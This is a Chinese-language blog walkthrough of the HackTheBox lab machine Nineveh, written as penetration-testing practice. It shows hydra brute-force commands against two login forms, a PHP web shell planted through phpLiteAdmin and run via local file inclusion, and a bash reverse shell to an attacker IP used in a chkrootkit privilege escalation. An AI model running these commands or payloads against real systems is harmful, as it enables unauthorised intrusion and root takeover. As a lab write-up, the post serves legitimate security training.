本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
一个每日分享渗透小技巧的公众号
大家好,这里是 大余安全 的第 111 篇文章,本公众号会每日分享攻防渗透技术给大家。
靶机地址:https://www.hackthebox.eu/home/machines/profile/54
靶机难度:中级(4.3/10)
靶机发布日期:2017 年 10 月 8 日
靶机描述:
Nineveh is not overly challenging, however several exploits must be chained to gain initial access. Several uncommon services are running on the machine, and some research is required to enumerate them.
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用 Kali Linux 作为解决该 HTB 的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机的 IP 是 10.10.10.43....
namp 仅发现开放了 80 和 443 端口,添加域名 nineveh.htb 到 hosts....
访问 web,未发现有用的信息... 爆破
爆破发现 / department 目录....
访问 department 这是个用户登录页面... 需要账号密码... 先放着... 目前没有账号密码信息登录...
访问开放的 443... 一张图,未发现有用的信息...
当时在站点发现了邮箱地址... 先放着...
爆破发现了 / db、/server-status、/secure_notes 三个目录信息...
访问 secure_notes 发现又是一张图在主页上...
但是下载图片后,发现了有用的信息,改图片存放着 RSA 密匙凭证... 应该很熟悉了,这是 SSH 登录需要的...
回看 nmap 未发现靶机开放了 ssh 服务... 那就只有可能是靶机本地开启了 ssh... 只有获取低权 shell 外壳查看下... 先放着这重要的信息....
继续访问 / db 目录,发下这是 phpLiteAdmin 的登录页面....
通过 searchsploit phpliteadmin 发现了几个漏洞... 分析这些漏洞...
有版本匹配漏洞,有执行 SQL 注入的,还有的利用 XSS 和 CSRF 漏洞攻击的...
但是都需要成功登录...
目前获得的信息 http 的 department 存在登录页面和 https 的 db 存在登录页面...
当时都没有账号密码.... 这里也没找到任何有关账号密码的信息提示... 直接暴力破解....
hydra -l admin -P 10k-most-common.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64
hydra -l admin -P dayupasswd 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -T 64
通过 hydra 的多种尝试... 成功获得了 https_db 和 http_department 页面的账号密码信息....
二、提权
登录 department 页面,在 notes 处发现了很多有价值的信息...
URL 处存在 LFI 攻击,以及提示了 ninevehNotes.txt 文件名称信息...
内容信息提示此页面连接着数据库... 以及~ amrois 不知道做什么用的信息....
这里存在 LFI 攻击的话,又连接着数据库... 思路应该是在数据库上传 shell,在这里执行即可... 试试
登录 db 页面后,根据前面收集信息查看到可利用的 phpLite... 的漏洞提示... 开始创建 shell...
<?php echo system($_REQUEST["dayu"]);?>
/var/tmp/ninevehNotes.php
根据漏洞利用提示,首先创建一个扩展名为的数据库,继续创建了 ninevehNotes.php....(这里是因为前面获取的 ninevehNotes.txt 信息提示修改的... 还因为测试了几遍就是无法获得 shell... 改了 ninevehNotes 名称后就可以了)
http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&dayu=dir
通过简单的测试... 成功利用 shell 注入查询信息....
直接利用一句话 shell 成功提 www 权限...
进来后直接印证本地开放了 ssh 服务...
通过反复思考前面获得的信息,LinEnum 枚举,以及 Find 查看了 amrois,发现存在 amrois 文件...
通过查看 amrois 文件信息... 最后提示了要获得 Amrois 用户权限,需要敲震(knock)571 290 911 端口...
继续 find 查看到了 knock 下存在的 knock.conf... 查看了配置,那就是在本地敲震端口后直接 ssh 利用 RSA 登陆即可...
sudo apt-get install knockd
knock 10.10.10.43 571 290 911
ssh -i id_ssh [email protected]
本地执行敲震,然后直接 ssh 成功获得了 Amrois 用户的权限... 并获得了 user_flag 信息....
在主目录下发现 report 只在 amrois 权限下执行使用... 查看发现了几个过去的文本文件...
随意查看了一个后... 发现里面记录的都是过去执行过的文件过程信息... 这里我需要查看用户执行的进程...
上传了 pspy32 对靶机的进程进行枚举...
可以看到很多 chkrootkit,这是一个工具,它在检查主机是否存在 rootkit 的迹象...
chkrootkit 存在漏洞....
本地进行查看... 发现存在可利用漏洞...
Chkrootkit 将以 root 身份运行任何名为 / tmp/update 的可执行文件,从而可以写入 payload_shell..... 这就简单了直接写即可
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.51/6666 0>&1
通过简单的写入 / tmp/update... 然后赋予权限执行... 成功获得了 root 权限... 获得了 root_flag 信息....
目录爆破 + hydra 密码爆破 + EXP 漏洞利用 + 端口敲震 + SSH_RSA+pspy 枚举 + chkrootkit 漏洞利用等等....
主要还是信息收集.... 信息收集越多,越容易拿下...
加油~~~
由于我们已经成功得到 root 权限查看 user 和 root.txt,因此完成这台中级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~
随缘收徒中~~ 随缘收徒中~~ 随缘收徒中~~
欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!
大余安全
一个全栈渗透小技巧的公众号